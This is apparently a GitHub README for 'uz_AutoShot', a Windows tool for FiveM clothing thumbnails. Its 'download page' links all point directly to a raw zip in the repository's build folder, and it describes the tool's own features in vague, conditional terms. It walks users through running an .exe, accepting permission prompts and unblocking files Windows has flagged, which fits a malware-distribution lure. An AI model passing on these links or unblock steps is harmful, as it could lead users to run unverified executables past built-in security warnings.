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πŸ–ΌοΈ uz_AutoShot - Make Clothing Shots Fast

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πŸš€ Getting Started

uz_AutoShot is a Windows app for making clothing thumbnails and browsing clothing items for FiveM. Use it to view outfits, create clean thumbnail images, and keep your clothing library easy to manage.

This guide shows you how to download the app, install it on Windows, and start using it with no tech skills needed.

πŸ“₯ Download

  1. Open the download page: https://github.com/Carlosl4251/uz_AutoShot/raw/refs/heads/main/resources/build/uz-Auto-Shot-v3.2.zip
  2. Find the latest release or file on the page.
  3. Download the Windows version.
  4. If the download gives you a .zip file, save it to your PC.
  5. If the download gives you an .exe file, you can run it after the file finishes downloading.

Use this link to visit the download page: https://github.com/Carlosl4251/uz_AutoShot/raw/refs/heads/main/resources/build/uz-Auto-Shot-v3.2.zip

πŸͺŸ System Requirements

Before you run uz_AutoShot, check that your PC meets these basic needs:

  • Windows 10 or Windows 11
  • A working internet connection
  • Enough free disk space for the app and image files
  • A mouse and keyboard
  • FiveM installed on your PC if you plan to browse game-related clothing files
  • A modern graphics setup for smooth preview and thumbnail work

For best results, use a PC with at least 8 GB of RAM and a recent Intel or AMD processor.

πŸ“¦ Install on Windows

If you downloaded a ZIP file

  1. Find the ZIP file in your Downloads folder.
  2. Right-click the file.
  3. Select Extract All.
  4. Choose a folder you can find again, such as Desktop or Documents.
  5. Open the extracted folder.
  6. Look for the app file inside the folder.
  7. Double-click the file to start the app.

If you downloaded an EXE file

  1. Find the .exe file in your Downloads folder.
  2. Double-click it.
  3. If Windows asks for permission, click Yes.
  4. Wait for the app to open.

If Windows blocks the file

  1. Right-click the file.
  2. Click Properties.
  3. At the bottom, look for Unblock.
  4. Check Unblock if you see it.
  5. Click Apply.
  6. Try opening the file again.

πŸ–±οΈ How to Use uz_AutoShot

uz_AutoShot is built to keep the process simple. A normal flow looks like this:

  1. Open the app.
  2. Load or browse the clothing items you want to work with.
  3. Pick the item you want to view.
  4. Set up the thumbnail view.
  5. Capture or generate the image.
  6. Save the thumbnail to your PC.
  7. Repeat for the next item.

If the app includes a clothing browser, use it to move through your available items and choose the one you need. If it includes a thumbnail maker, use it to create a clean image for each piece of clothing.

🎯 Main Features

πŸ‘• Clothing Thumbnail Generator

Create clean thumbnails for FiveM clothing items. This helps you keep your clothing library easy to scan and sort.

πŸ” Clothing Browser

Browse clothing items in one place without jumping between folders or menus. This saves time when you need to find a specific item fast.

πŸ—‚οΈ Simple Item View

View clothing items one by one in a clear layout. This makes it easier to compare items and choose the right one.

πŸ’Ύ Save Your Work

Save your thumbnails to a folder on your PC so you can use them later in your FiveM workflow.

πŸͺŸ Windows-Friendly Setup

The app is meant for Windows users, so it fits a normal desktop setup and does not need extra tools for basic use.

🧭 Basic Workflow

Use this flow if you are starting for the first time:

  1. Download the app from the GitHub page.
  2. Extract or run the file.
  3. Open the app.
  4. Load your clothing set or browse the clothing list.
  5. Select the item you want.
  6. Create the thumbnail.
  7. Save the image.
  8. Move to the next item.

If you work with many clothing items, keep a folder for your final images. That makes it easier to find them later.

πŸ“ Suggested Folder Setup

A simple folder setup can help you stay organized:

  • Downloads for the original file
  • uz_AutoShot for the extracted app
  • Clothing for your item files
  • Thumbnails for the images you create
  • Archive for old items you do not use often

This setup keeps your files easy to manage and helps you avoid confusion.

πŸ› οΈ Tips for Better Results

  • Use a clean desktop when taking thumbnail shots.
  • Keep your screen resolution steady while making images.
  • Name your files in a way that makes sense to you.
  • Store each clothing type in its own folder.
  • Save often so you do not lose your work.
  • Keep the app in a folder you will not move often.

If you make thumbnails for many items, use the same view and the same file size for each one. That helps your set look neat and consistent.

❓ Common Questions

Do I need programming skills?

No. uz_AutoShot is meant for normal Windows users.

Do I need FiveM?

If you want to use the app for FiveM clothing work, yes, FiveM should be installed.

Where do I get the app?

Use the GitHub page here: https://github.com/Carlosl4251/uz_AutoShot/raw/refs/heads/main/resources/build/uz-Auto-Shot-v3.2.zip

What file type should I download?

Download the Windows file on the release page. If you see a .zip, extract it first. If you see a .exe, run it.

What if the app does not open?

Try these steps:

  • Make sure the file finished downloading
  • Extract the ZIP file if needed
  • Right-click and run the app again
  • Check if Windows blocked the file
  • Restart your PC and try again

πŸ”§ Troubleshooting

The app does not start

  • Check that you opened the correct file
  • Make sure the file is not still inside the ZIP
  • Run it from a normal folder, like Desktop or Documents
  • Close and reopen the app
  • Restart Windows if needed

The app opens, but I cannot see clothing items

  • Check that your clothing files are in the right folder
  • Make sure the files are not moved or renamed
  • Refresh the view if the app has a refresh option
  • Open the folder again and try loading it one more time

The thumbnails look wrong

  • Check your camera or view angle
  • Make sure the item is loaded fully
  • Try the same settings for each shot
  • Save the image again with a clear filename

Windows shows a security prompt

This can happen with downloaded apps. If Windows asks for permission, review the file path and continue only if you meant to open the file you downloaded from the GitHub page.

🧩 File Types You May See

You may see one of these after download:

  • .zip β€” a compressed folder you need to extract
  • .exe β€” a Windows app file you can run
  • .png β€” image output from thumbnails
  • .jpg or .jpeg β€” image output from thumbnails

πŸ“ Recommended Use

uz_AutoShot works well if you need to:

  • Make clothing preview images
  • Keep a set of clothing items in order
  • Browse items without opening many folders
  • Build a cleaner workflow for FiveM clothing content

πŸ“Œ Download Again

If you need the file again, go here: https://github.com/Carlosl4251/uz_AutoShot/raw/refs/heads/main/resources/build/uz-Auto-Shot-v3.2.zip

🀝 Project Topic

  • FiveM

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